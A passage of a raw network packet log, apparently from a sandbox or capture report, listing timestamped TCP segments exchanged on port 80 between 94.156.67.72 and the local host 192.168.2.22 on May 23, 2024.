May 23, 2024 20:21:05.571079016 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.571137905 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.577742100 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.577778101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.577795029 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.577822924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.586662054 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.586699963 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.586714983 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.586743116 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.591125965 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.591161013 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.591171980 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.591203928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.597738028 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.597774029 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.597790956 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.597806931 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.597817898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.597843885 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.604794025 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.604829073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.604846001 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.604872942 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.610977888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.611013889 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.611027002 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.611061096 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.615885019 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.615921974 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.615932941 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.615963936 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.622637987 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.622663975 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.622675896 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.622695923 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.622728109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.622728109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.627185106 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.627199888 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.627252102 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.632740021 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.632755995 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.632783890 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.632802010 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.638956070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.638968945 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.638998032 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.639014006 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.647543907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.647561073 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.647598028 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.648477077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.648490906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.648500919 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.648514986 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.648518085 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.648529053 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.648549080 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.682882071 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.682902098 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.682993889 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.686686993 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.686702013 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.686712027 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.686754942 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.686768055 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.702835083 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.702872038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.702905893 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.702907085 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.702922106 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.702943087 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.702951908 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.702990055 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.703020096 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.703054905 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.703071117 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.703088999 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.703099966 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.703123093 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.703136921 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.703174114 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.709140062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.709175110 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.709203959 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.709213972 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.709270954 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.709305048 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.709319115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.709351063 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.711466074 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.711524010 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.712966919 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.713001966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.713023901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.713035107 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.713043928 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.713073969 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.717498064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.717534065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.717565060 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.717578888 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.719609022 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.719645977 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.719667912 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.719683886 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.723763943 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.723798990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.723824024 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.723841906 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.727998018 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.728035927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.728055000 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.728075027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.738730907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.738768101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.738796949 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.738831043 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.738905907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.738936901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.738955021 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.739321947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.739356041 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.739378929 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.739399910 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.742697954 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.742732048 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.742750883 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.742765903 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.745142937 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.745177031 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.745203972 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.745218039 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.748248100 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.748282909 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.748302937 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.748317957 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.748321056 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.748362064 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.751327038 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.751363039 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.751389980 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.751400948 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775590897 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775651932 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775690079 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775700092 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775724888 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775727987 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775736094 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775763988 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775764942 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775801897 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775803089 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775840998 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.775845051 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.775882959 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.777338028 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.777375937 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.777401924 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.777426004 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.779654026 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.779694080 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.779722929 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.779735088 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.781614065 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.781652927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.781691074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.781691074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.795272112 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.795335054 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.806004047 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.806070089 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.810602903 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.810642004 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.810663939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.810677052 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.810682058 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.810722113 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.812061071 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.812098026 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.812118053 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.812141895 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.815092087 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.815128088 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.815155029 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.815172911 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.818142891 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.818180084 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.818201065 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.818217039 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.822567940 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.822586060 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.822632074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.822645903 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.824269056 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.824306011 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.824328899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.824340105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.824340105 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.824383974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.827317953 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.827353001 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.827385902 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.827394962 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.829761028 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.829797029 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.829821110 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.829830885 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.829837084 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.829874039 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.834527969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.834563017 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.834587097 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.834602118 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.834759951 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.834796906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.834811926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.834836960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.838535070 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.838570118 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.838589907 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.838608027 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.839550972 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.839586973 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.839603901 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.839620113 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.839626074 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.839663029 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.841885090 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.841921091 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.841942072 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.841954947 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.841963053 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.841995955 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.844229937 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.844263077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.844293118 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.844319105 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.846599102 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.846635103 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.846657991 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.846673965 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.850656986 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.850692034 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.850718975 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.850733995 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.851255894 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.851290941 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.851304054 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.851331949 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.853718042 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.853754044 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.853779078 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.853787899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.853786945 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.853832960 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.856157064 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.856193066 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.856216908 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.856225014 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.858609915 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.858671904 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.859911919 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.859947920 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.859975100 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.859989882 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.862236977 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.862274885 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.862293959 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.862313986 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.864614964 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.864650965 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.864671946 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.864686966 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.864692926 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.864727974 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.870755911 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.870819092 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.870850086 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.870906115 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.872865915 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.872927904 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.874022007 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.874073982 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.883542061 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.883578062 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.883610964 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.883898973 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.885912895 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.885950089 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.885971069 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.885988951 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.888309956 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.888344049 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.888375998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.888376951 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.888408899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.888408899 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.890664101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.890701056 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.890723944 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.890734911 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.890743017 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.890777111 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.892666101 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.892702103 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.892726898 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.892749071 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.894438982 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.894474983 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.894499063 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.894527912 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.896328926 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.896364927 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.896378040 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.896397114 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.896406889 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.896435976 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.898211002 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.898246050 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.898268938 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.898278952 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.900118113 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.900152922 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.900171041 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.900187969 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.900197983 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.900221109 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.901988983 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.902025938 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.902041912 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.902064085 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.903924942 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.903959990 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.903980017 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.903989077 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.904000998 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.904027939 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.905632973 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.905668974 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.905687094 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.905710936 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.907795906 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.907831907 CEST	80	49169	94.156.67.72	192.168.2.22
May 23, 2024 20:21:05.907859087 CEST	49169	80	192.168.2.22	94.156.67.72
May 23, 2024 20:21:05.907866001 CEST	80	49169	94.156.67.72	192.168.2.22
